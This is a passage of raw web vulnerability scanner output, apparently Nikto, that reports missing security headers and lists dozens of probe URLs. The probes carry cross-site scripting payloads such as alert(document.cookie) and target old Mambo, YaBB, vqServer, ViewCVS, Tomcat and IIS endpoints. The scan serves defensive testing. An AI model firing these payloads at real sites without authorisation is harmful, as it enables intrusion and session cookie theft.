  612. + The anti-clickjacking X-Frame-Options header is not present.
  613. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
  614. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
  615. + Uncommon header 'x-squid-error' found, with contents: ERR_INVALID_REQ 0
  616. + Multiple index files found: /index.1.html/index.do, /index.1.html/index.asp, /index.1.html/index.cfm, /index.1.html/index.shtml, /index.1.html/index.php, /index.1.html/index.htm, /index.1.html/index.xml, /index.1.html/index.php3, /index.1.html/index.jhtml, /index.1.html/index.cgi, /index.1.html/index.pl, /index.1.html/index.aspx
  617. + Server banner has changed from '' to 'nginx' which may suggest a WAF, load balancer or proxy is in place
  618. + OSVDB-7501: /index.1.html/themes/mambosimple.php?detection=detected&sitename=</title><script>alert(document.cookie)</script>: Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  619. + /index.1.html/index.php?option=search&searchword=<script>alert(document.cookie);</script>: Mambo Site Server 4.0 build 10 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  620. + OSVDB-7505: /index.1.html/emailfriend/emailnews.php?id=\"<script>alert(document.cookie)</script>: Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  621. + OSVDB-7504: /index.1.html/emailfriend/emailfaq.php?id=\"<script>alert(document.cookie)</script>: Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  622. + OSVDB-7503: /index.1.html/emailfriend/emailarticle.php?id=\"<script>alert(document.cookie)</script>: Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  623. + /index.1.html/administrator/upload.php?newbanner=1&choice=\"<script>alert(document.cookie)</script>: Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  624. + OSVDB-7495: /index.1.html/administrator/popups/sectionswindow.php?type=web&link=\"<script>alert(document.cookie)</script>: Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  625. + OSVDB-7498: /index.1.html/administrator/gallery/view.php?path=\"<script>alert(document.cookie)</script>: Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  626. + OSVDB-7499: /index.1.html/administrator/gallery/uploadimage.php?directory=\"<script>alert(document.cookie)</script>: Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  627. + OSVDB-7497: /index.1.html/administrator/gallery/navigation.php?directory=\"<script>alert(document.cookie)</script>: Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  628. + OSVDB-7496: /index.1.html/administrator/gallery/gallery.php?directory=\"<script>alert(document.cookie)</script>: Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  629. + OSVDB-2820: /index.1.html/index.php?dir=<script>alert('Vulnerable')</script>: Auto Directory Index 1.2.3 and prior are vulnerable to XSS attacks.
  630. + /index.1.html/https-admserv/bin/index?/<script>alert(document.cookie)</script>: Sun ONE Web Server 6.1 administration control is vulnerable to XSS attacks.
  631. + /index.1.html/servlet/MsgPage?action=test&msg=<script>alert('Vulnerable')</script>: NetDetector 3.0 and below are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  632. + /index.1.html/servlet/org.apache.catalina.ContainerServlet/<script>alert('Vulnerable')</script>: Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes. http://www.cert.org/advisories/CA-2000-02.html.
  633. + /index.1.html/servlet/org.apache.catalina.Context/<script>alert('Vulnerable')</script>: Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes. http://www.cert.org/advisories/CA-2000-02.html.
  634. + /index.1.html/servlet/org.apache.catalina.Globals/<script>alert('Vulnerable')</script>: Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes. http://www.cert.org/advisories/CA-2000-02.html.
  635. + /index.1.html/servlet/org.apache.catalina.servlets.WebdavStatus/<script>alert('Vulnerable')</script>: Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes. http://www.cert.org/advisories/CA-2000-02.html.
  636. + /index.1.html/servlets/MsgPage?action=badlogin&msg=<script>alert('Vulnerable')</script>: The NetDetector install is vulnerable to Cross Site Scripting (XSS) in its invalid login message. http://www.cert.org/advisories/CA-2000-02.html.
  637. + /index.1.html/admin/sh_taskframes.asp?Title=Configuraci%C3%B3n%20de%20registro%20Web&URL=MasterSettings/Web_LogSettings.asp?tab1=TabsWebServer%26tab2=TabsWebLogSettings%26__SAPageKey=5742D5874845934A134CD05F39C63240&ReturnURL=\"><script>alert(document.cookie)</script>: IIS 6 on Windows 2003 is vulnerable to Cross Site Scripting (XSS) in certain error messages. http://www.cert.org/advisories/CA-2000-02.html.
  638. + OSVDB-17665: /index.1.html/SiteServer/Knowledge/Default.asp?ctr=\"><script>alert('Vulnerable')</script>: Site Server is vulnerable to Cross Site Scripting
  639. + OSVDB-17666: /index.1.html/_mem_bin/formslogin.asp?\"><script>alert('Vulnerable')</script>: Site Server is vulnerable to Cross Site Scripting
  640. + /index.1.html/nosuchurl/><script>alert('Vulnerable')</script>: JEUS is vulnerable to Cross Site Scripting (XSS) when requesting non-existing JSP pages. http://securitytracker.com/alerts/2003/Jun/1007004.html
  641. + OSVDB-3624: /index.1.html/webcalendar/week.php?eventinfo=<script>alert(document.cookie)</script>: Webcalendar 0.9.42 and below are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  642. + OSVDB-9234: /index.1.html/cgi.cgi/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>: YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  643. + OSVDB-9234: /index.1.html/webcgi/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>: YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  644. + OSVDB-9234: /index.1.html/cgi-914/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>: YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  645. + OSVDB-9234: /index.1.html/cgi-915/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>: YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  646. + OSVDB-9234: /index.1.html/bin/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>: YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  647. + OSVDB-9234: /index.1.html/cgi/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>: YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  648. + OSVDB-9234: /index.1.html/mpcgi/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>: YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  649. + OSVDB-9234: /index.1.html/cgi-bin/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>: YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  650. + OSVDB-9234: /index.1.html/ows-bin/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>: YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  651. + OSVDB-9234: /index.1.html/cgi-sys/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>: YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  652. + OSVDB-9234: /index.1.html/cgi-local/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>: YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  653. + OSVDB-9234: /index.1.html/htbin/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>: YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  654. + OSVDB-9234: /index.1.html/cgibin/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>: YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  655. + OSVDB-9234: /index.1.html/cgis/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>: YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  656. + OSVDB-9234: /index.1.html/scripts/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>: YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  657. + OSVDB-9234: /index.1.html/cgi-win/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>: YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  658. + OSVDB-9234: /index.1.html/fcgi-bin/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>: YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  659. + OSVDB-9234: /index.1.html/cgi-exe/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>: YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  660. + OSVDB-9234: /index.1.html/cgi-home/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>: YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  661. + OSVDB-9234: /index.1.html/cgi-perl/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>: YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  662. + OSVDB-9234: /index.1.html/scgi-bin/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>: YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  663. + OSVDB-9234: /index.1.html/cgi-bin-sdb/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>: YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  664. + OSVDB-9234: /index.1.html/cgi-mod/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>: YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  665. + /index.1.html/cgi.cgi/vq/demos/respond.pl?<script>alert('Vulnerable')</script>: vqServer default CGI files are vulnerable to Cross Site Scripting (XSS), remove all default CGI files. http://www.cert.org/advisories/CA-2000-02.html.
  666. + /index.1.html/webcgi/vq/demos/respond.pl?<script>alert('Vulnerable')</script>: vqServer default CGI files are vulnerable to Cross Site Scripting (XSS), remove all default CGI files. http://www.cert.org/advisories/CA-2000-02.html.
  667. + /index.1.html/cgi-914/vq/demos/respond.pl?<script>alert('Vulnerable')</script>: vqServer default CGI files are vulnerable to Cross Site Scripting (XSS), remove all default CGI files. http://www.cert.org/advisories/CA-2000-02.html.
  668. + /index.1.html/cgi-915/vq/demos/respond.pl?<script>alert('Vulnerable')</script>: vqServer default CGI files are vulnerable to Cross Site Scripting (XSS), remove all default CGI files. http://www.cert.org/advisories/CA-2000-02.html.
  669. + /index.1.html/bin/vq/demos/respond.pl?<script>alert('Vulnerable')</script>: vqServer default CGI files are vulnerable to Cross Site Scripting (XSS), remove all default CGI files. http://www.cert.org/advisories/CA-2000-02.html.
  670. + /index.1.html/cgi/vq/demos/respond.pl?<script>alert('Vulnerable')</script>: vqServer default CGI files are vulnerable to Cross Site Scripting (XSS), remove all default CGI files. http://www.cert.org/advisories/CA-2000-02.html.
  671. + /index.1.html/mpcgi/vq/demos/respond.pl?<script>alert('Vulnerable')</script>: vqServer default CGI files are vulnerable to Cross Site Scripting (XSS), remove all default CGI files. http://www.cert.org/advisories/CA-2000-02.html.
  672. + /index.1.html/cgi-bin/vq/demos/respond.pl?<script>alert('Vulnerable')</script>: vqServer default CGI files are vulnerable to Cross Site Scripting (XSS), remove all default CGI files. http://www.cert.org/advisories/CA-2000-02.html.
  673. + /index.1.html/ows-bin/vq/demos/respond.pl?<script>alert('Vulnerable')</script>: vqServer default CGI files are vulnerable to Cross Site Scripting (XSS), remove all default CGI files. http://www.cert.org/advisories/CA-2000-02.html.
  674. + /index.1.html/cgi-sys/vq/demos/respond.pl?<script>alert('Vulnerable')</script>: vqServer default CGI files are vulnerable to Cross Site Scripting (XSS), remove all default CGI files. http://www.cert.org/advisories/CA-2000-02.html.
  675. + /index.1.html/cgi-local/vq/demos/respond.pl?<script>alert('Vulnerable')</script>: vqServer default CGI files are vulnerable to Cross Site Scripting (XSS), remove all default CGI files. http://www.cert.org/advisories/CA-2000-02.html.
  676. + /index.1.html/htbin/vq/demos/respond.pl?<script>alert('Vulnerable')</script>: vqServer default CGI files are vulnerable to Cross Site Scripting (XSS), remove all default CGI files. http://www.cert.org/advisories/CA-2000-02.html.
  677. + /index.1.html/cgibin/vq/demos/respond.pl?<script>alert('Vulnerable')</script>: vqServer default CGI files are vulnerable to Cross Site Scripting (XSS), remove all default CGI files. http://www.cert.org/advisories/CA-2000-02.html.
  678. + /index.1.html/cgis/vq/demos/respond.pl?<script>alert('Vulnerable')</script>: vqServer default CGI files are vulnerable to Cross Site Scripting (XSS), remove all default CGI files. http://www.cert.org/advisories/CA-2000-02.html.
  679. + /index.1.html/scripts/vq/demos/respond.pl?<script>alert('Vulnerable')</script>: vqServer default CGI files are vulnerable to Cross Site Scripting (XSS), remove all default CGI files. http://www.cert.org/advisories/CA-2000-02.html.
  680. + /index.1.html/cgi-win/vq/demos/respond.pl?<script>alert('Vulnerable')</script>: vqServer default CGI files are vulnerable to Cross Site Scripting (XSS), remove all default CGI files. http://www.cert.org/advisories/CA-2000-02.html.
  681. + /index.1.html/fcgi-bin/vq/demos/respond.pl?<script>alert('Vulnerable')</script>: vqServer default CGI files are vulnerable to Cross Site Scripting (XSS), remove all default CGI files. http://www.cert.org/advisories/CA-2000-02.html.
  682. + /index.1.html/cgi-exe/vq/demos/respond.pl?<script>alert('Vulnerable')</script>: vqServer default CGI files are vulnerable to Cross Site Scripting (XSS), remove all default CGI files. http://www.cert.org/advisories/CA-2000-02.html.
  683. + /index.1.html/cgi-home/vq/demos/respond.pl?<script>alert('Vulnerable')</script>: vqServer default CGI files are vulnerable to Cross Site Scripting (XSS), remove all default CGI files. http://www.cert.org/advisories/CA-2000-02.html.
  684. + /index.1.html/cgi-perl/vq/demos/respond.pl?<script>alert('Vulnerable')</script>: vqServer default CGI files are vulnerable to Cross Site Scripting (XSS), remove all default CGI files. http://www.cert.org/advisories/CA-2000-02.html.
  685. + /index.1.html/scgi-bin/vq/demos/respond.pl?<script>alert('Vulnerable')</script>: vqServer default CGI files are vulnerable to Cross Site Scripting (XSS), remove all default CGI files. http://www.cert.org/advisories/CA-2000-02.html.
  686. + /index.1.html/cgi-bin-sdb/vq/demos/respond.pl?<script>alert('Vulnerable')</script>: vqServer default CGI files are vulnerable to Cross Site Scripting (XSS), remove all default CGI files. http://www.cert.org/advisories/CA-2000-02.html.
  687. + /index.1.html/cgi-mod/vq/demos/respond.pl?<script>alert('Vulnerable')</script>: vqServer default CGI files are vulnerable to Cross Site Scripting (XSS), remove all default CGI files. http://www.cert.org/advisories/CA-2000-02.html.
  688. + OSVDB-6458: /index.1.html/cgi.cgi/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>;: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
  689. + OSVDB-6458: /index.1.html/webcgi/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>;: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
  690. + OSVDB-6458: /index.1.html/cgi-914/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>;: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
  691. + OSVDB-6458: /index.1.html/cgi-915/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>;: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
  692. + OSVDB-6458: /index.1.html/bin/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>;: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
  693. + OSVDB-6458: /index.1.html/cgi/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>;: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
  694. + OSVDB-6458: /index.1.html/mpcgi/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>;: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
  695. + OSVDB-6458: /index.1.html/cgi-bin/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>;: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
  696. + OSVDB-6458: /index.1.html/ows-bin/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>;: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
  697. + OSVDB-6458: /index.1.html/cgi-sys/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>;: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
  698. + OSVDB-6458: /index.1.html/cgi-local/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>;: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
  699. + OSVDB-6458: /index.1.html/htbin/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>;: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
  700. + OSVDB-6458: /index.1.html/cgibin/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>;: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
  701. + OSVDB-6458: /index.1.html/cgis/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>;: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
  702. + OSVDB-6458: /index.1.html/scripts/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>;: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
  703. + OSVDB-6458: /index.1.html/cgi-win/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>;: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
  704. + OSVDB-6458: /index.1.html/fcgi-bin/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>;: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
  705. + OSVDB-6458: /index.1.html/cgi-exe/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>;: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
  706. + OSVDB-6458: /index.1.html/cgi-home/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>;: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
  707. + OSVDB-6458: /index.1.html/cgi-perl/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>;: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
  708. + OSVDB-6458: /index.1.html/scgi-bin/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>;: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
  709. + OSVDB-6458: /index.1.html/cgi-bin-sdb/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>;: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
  710. + OSVDB-6458: /index.1.html/cgi-mod/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>;: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
  711. + OSVDB-6458: /index.1.html/cgi.cgi/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
  712. + OSVDB-6458: /index.1.html/webcgi/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
  713. + OSVDB-6458: /index.1.html/cgi-914/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
  714. + OSVDB-6458: /index.1.html/cgi-915/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
  715. + OSVDB-6458: /index.1.html/bin/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
  716. + OSVDB-6458: /index.1.html/cgi/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
  717. + OSVDB-6458: /index.1.html/mpcgi/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
  718. + OSVDB-6458: /index.1.html/cgi-bin/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
  719. + OSVDB-6458: /index.1.html/ows-bin/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
  720. + OSVDB-6458: /index.1.html/cgi-sys/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
  721. + OSVDB-6458: /index.1.html/cgi-local/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
  722. + OSVDB-6458: /index.1.html/htbin/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
  723. + OSVDB-6458: /index.1.html/cgibin/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
  724. + OSVDB-6458: /index.1.html/cgis/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
  725. + OSVDB-6458: /index.1.html/scripts/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
  726. + OSVDB-6458: /index.1.html/cgi-win/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
  727. + OSVDB-6458: /index.1.html/fcgi-bin/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
  728. + OSVDB-6458: /index.1.html/cgi-exe/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
